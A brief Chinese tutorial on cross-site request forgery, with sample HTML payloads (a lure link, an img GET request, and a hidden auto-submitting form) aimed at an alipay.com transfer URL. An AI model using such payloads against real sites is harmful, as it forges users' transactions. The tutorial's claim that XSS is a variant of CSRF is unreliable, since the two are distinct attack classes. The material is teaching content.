CSRF全称叫做,跨站请求伪造。
就是黑客可以伪造用户的身份去做一些操作,进而满足自身目的。
这是请求伪造的基本原理。那么支付宝验证用户身份的机制是什么呢?
伪造请求的方式一般有如下几种方式:
页面中有一个超链接,诱导用户进行点击
<a href=”https://alipay.com?userid=3&money=9999”>iphone8提前曝光</a>
直接在页面上使用Img进行get请求
<img src=”https://alipay.com?userid=3&money=9999”/>
或使用表单进行提交
<iframe name="heihei" style="display:none;"></iframe>
<form action="https://alipay.com?userid=3&money=9999"method="post"target="heihei" >
<inputname="userid"value="3" type="hidden" />
<inputname="money"value="9999" type="hidden" />
</form>
<script>
window.onload = function(){
document.forms[0].submit();
}
</script>
除此之外,CSRF还有一个变种攻击,叫做XSS
使用了脚本注入的原理,来进行更彻底的身份伪造。
以上是关于CSRF的攻击方式及原理介绍。
来源:千锋HTML5